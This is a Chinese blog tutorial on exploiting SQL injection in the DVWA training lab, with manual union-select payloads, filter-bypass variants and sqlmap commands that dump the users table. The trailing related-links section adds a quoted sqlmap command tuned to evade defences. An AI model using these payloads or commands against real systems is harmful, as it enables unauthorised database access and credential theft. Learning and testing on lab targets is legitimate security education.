DVWA之SQL注入漏洞与SQLmap

最新推荐文章于 2025-06-15 15:14:20 发布
最新推荐文章于 2025-06-15 15:14:20 发布
阅读量997 收藏 17
点赞数 13
CC 4.0 BY-SA版权
文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leaf_lucky/article/details/135821332

一:怎么判断SQL注入漏洞

输入以下语句:

1'and 1=1#

输入上面的语句有正常输出,对于“#”的作用是注释后续SQL语句

而对于以下语句,可以发现没有语句,SQL语句变化,1 != 2,不能得到输出

1'and 1=2#

对于以上两个语句,1=1会正常输出,而1=2 错误输出,可以说明SQL语句生效,SQL语句存在漏洞。

二:怎么利用SQL注入漏洞

步骤一:判断列/字段数,利用语句 order by [列/字段数]

输入以下语句:

1' order by 1#
1' order by 2#
1' order by 3#

对于上面三句语句,依次进行判断,可以得到

输入1' order by 1#得到

输入1' order by 2# 得到

 

输入1' order by 3# 得到

 

所以得到这个数据库的表只有两列/两个字段

步骤二:联合查询其他信息

用户输入SQL语句,执行了MySQL内置函数user(),database()

其中user()返回当前数据库连接用户,database()返回当前数据库名称

输入以下语句

1' union select user(),database()#

步骤三:联合查询表

 输入以下语句

1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#
 步骤四:联合查询信息

输入以下语句

1' union select uesr,password from user#

三:SQLmap自动化SQL注入利用过程

步骤一:检测漏洞

在输入框中任意写入一个数据1,拷贝上面的链接为

http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

接着按f12进入到开发者模式,点击Network (网络),然后点击Reload(重新加载)

点击第一个,找到cookie,复制下来,即是以下语句

security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada

输入语句

sqlmap -u "http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada"

可以得到

 

步骤二:获取数据库名

输入以下语句

sqlmap -u "http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" --dbs

可以得到

 可以看到有两个数据库

步骤三:或者指定数据库表

输入以下语句

sqlmap -u "http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa --tables

其中

-D:Database指定想要获取的数据库名为dvwa

--tables:列出数据库表

得到

 

步骤四:获取指定数据库列/表项

 输入以下语句

sqlmap -u "http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa -T users --columns

其中

-T:Table指定想要获取的名为users,

--column:列出表项/列

得到

 

步骤五:获取数据

输入以下语句

sqlmap -u "http://192.168.177.134/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=j6not3p5vj7kkh3j8kdtncj745; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa -T users --dump

 --dump:代表获取数据

可以得到:

 

三:SQL injection防御--过滤用户输入内容,不让输入sql语句

原理:将特殊符号替换成空,或判断用户输入sql语句就终止执行

将DVWA等级换成medium(转移了特殊字符) 

上面语句为原本的SQL语句,下面语句为过滤后的语句 

1' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'#

1\' union select table_name,table_schema from information_schema.tables where table_schema=\'dvwa\'#

SQL语句错了,没有'\'符号

两种解决办法:

方法一:将dvwa替换成database()

1' union select table_name,table_schema from information_schema.tables where table_schema=database()#

方法二:将dvwa替换成十六进制格式 

1' union select table_name,table_schema from information_schema.tables where table_schema=0x64767761#

 将DVWA等级换成high等级

DVWA high防御中缺少传入数据的过滤,无法防御注入漏洞

leaf_lucky
关注
利用漏洞注入sql注入
xianyunb的博客
06-21 451
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者。
DVWA-SQL注入sqlmap安装和使用)
weixin_53256941的博客
07-12 1065
一.Python环境安装 链接: https://pan.baidu.com/s/1ZbR6LoKcSvqnF82UZvkesg?pwd=e79b 提取码: e79b 双击安装包进行安装配置环境变量 我的电脑,找到属性点击高级系统设置 出现"系统属性",点击环境变量 在下面的"系统变量"里面找到Path变量点击编辑,(没有的话点击新建)在变量值末尾,填上python安装路径 win+R+cmd打开命令窗口输入python出现此页面表示安装成功 二.Sqlmap安装 链接:https://pan.baidu.
sqlmap扫描DVWA靶场(sql注入低、中、高)
最新发布
xingxin32的博客
06-15 333
二、打开kali,在网页输入搭建好dvwa主机的IP(ps:Windows系统IP查询命令ipconfig,Linux系统IP查询命令ifconfig)6.点开Repeater,并修改代码为id=1 or 1=1(注意:这里根据kali版本的不同,有些需要后面加#,有些不需要)Windows电脑、下载phpstudy、搭建好dvwa靶场、里面有kali、sqlmap、burpsuite等软件。4.-D 数据库名 -T 表名 -C "字段,字段" --dump 获取表字段对应的数据。
DVWASQL注入漏洞
weixin_56306210的博客
01-30 2877
DVWASQL注入漏洞
DVWA——SQL注入——sqlmap实现
weixin_46709219的博客
11-14 1572
网络安全-sqlmap学习笔记 sqlmap上面的总连接
DVWA-SQL注入漏洞
weixin_74406445的博客
09-09 1321
请查看注释,DVWA high防御中缺失传入数据的过滤,无法防御漏洞,只是添加了sql语句的限制,关于LIMIT 1的用法本文不过多赘述,请查看。cookie的数值通过,在指定的网页按F12,进入开发者模式中,点击网络,在“请求标头”找到对应的数值,如下图所示。用户输入SQL语句,从information_schem数据库中查询dvwa的数据库表。正常网站可以直接输入网址,但是我们这里利用的是DVWA,需要登陆,因此微调我们的代码。2.安装kali操作系统,kali自带sqlmap,输入sqlmap执行。
【渗透测试】|sqlmap工具注入-基于dvwasql injection
yangdan_jiayou的博客
03-27 1405
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
【渗透测试】 sqlmap工具注入-基于dvwasql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1262
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DVWA——SQL注入+盲注
qq_58553228的博客
06-02 2314
目的:执行特定sql语句,获得其他相关内容。攻击方式:动态构造SQL语句影响:数据库的脱裤、修改、甚至影响到操作系统。
SQL注入漏洞sqlmap自动注入
XZZbh的博客
09-19 696
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
DVWA靶场SQL注入
Tangyoo的博客
07-03 1568
SQL注入是指攻击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
DVWA通过攻略之SQL注入
热门推荐
勿山几已
05-24 1万+
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
Sqlmap
mumuzi2的博客
02-25 430
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
DVWA亲测SQL注入漏洞
YWBOY-小忘-安全菜鸟-Web狗
08-09 657
介绍: 关于sql注入的基础知识,我上篇文章也写过了,这篇就用靶机的漏洞环境来实践操作一下,所谓实践出真理嘛,我们这次试用的漏洞平台是DVWA,Github下载地址:DVWA 关于一下注入的基本知识或者姿势,我会在实践中详解。 实验: LOW等级 先输入1看一下 我们在加个单引号 这里的搜索框为什么没有显示单引号呢?因为被url编码了 一般的url编码其实就是那个字符的ASCII值得十六进制,...
网络安全——DVWASQL注入漏洞
猿的一天
01-10 2695
网络安全——DVWASQL注入漏洞
利用DVWA学习sqlmap(1)
csu_vc的博客
07-17 8530
首先我们要在一台机器上配置dvwa环境下载地址 https://github.com/ethicalhack3r/DVWADVWA的源代码下载好之后,我们需要在受害机器上配置web服务,并配置dvwa 这里我使用的是phpstudy,因为它比较方便 把dvwa的源代码解压到phpstudy的www目录下,并到./config目录下修改配置文件把root和passwd修改为当前机器的数据库
DVWASQL注入漏洞学习记录
冷人 菜鸟 的博客
03-29 414
这个命令将返回users表中所有的行,因为'1'='1'条件始终为真。SQL注入漏洞是指攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而绕过应用程序的身份验证和访问控制,进而执行操纵数据库的操作。这种漏洞是由于应用程序没有对用户输入进行充分的验证和过滤导致的。这个命令将返回users表中所有的行,因为'1'='1'条件始终为真。
sqlmap测试dvwa-sql注入high
qq_39511050的博客
08-12 2162
sqlmap测试dvwa-sql注入high
dvwa中等难度sql注入使用sqlmap
01-04
### 使用Sqlmap针对DVWA Medium Level SQL Injection进行渗透测试 对于DVWA中的SQL注入漏洞,在中等安全级别下,可以利用`sqlmap`工具来进行自动化检测和数据提取。为了成功实施这一过程,确保设置正确的参数来匹配目标环境的要求。 #### 准备工作 在启动`sqlmap`之前,先要访问DVWA页面并登录,调整安全性等级至Medium。接着通过浏览器开发者工具捕获请求,从中复制带有有效会话ID(`PHPSESSID`)的Cookie值[^2]。 #### 构建命令行指令 构建用于发起攻击的命令如下所示: ```bash sqlmap -u "http://<target-ip>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" \ --cookie="PHPSESSID=<your-session-id>;security=medium" \ --dbms=mysql --technique=E --level=5 --risk=3 --random-agent ``` 此命令指定了URL路径、必要的Cookies以及数据库管理系统类型(MySQL),同时还设置了技术选项(Technique)为基于错误(Error-based)的方式,并提高了扫描强度(Level)风险(Risk)。 - `-u`: 指定目标网址。 - `--cookie`: 提供必需的身份验证信息。 - `--dbms`: 明确指出使用的DBMS种类以便更精确地探测。 - `--technique=E`: 采用基于错误的技术进行尝试。 - `--level=5`: 设置详细的测试水平。 - `--risk=3`: 增加潜在危险操作的可能性。 - `--random-agent`: 随机更改User-Agent头以规避某些防护机制。 #### 获取敏感信息 一旦确认存在可利用的漏洞,可以通过附加更多参数进一步挖掘有价值的数据,比如枚举表名或列名甚至导出具体记录。例如,想要查看名为`users`表格的内容,则追加相应选项: ```bash -D dvwa -T users -C username,password --dump ``` 这将指示`sqlmap`连接到指定数据库(Dvwa),定位特定表(Users)及其字段(User,Password),最后输出所有条目。 #### 注意事项 在整个过程中务必遵守法律法规,仅限于授权范围内开展此类活动。此外,考虑到实际环境中可能存在的防御措施(如WAF),适当调节配置项有助于提高成功率的同时减少被发现的风险。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值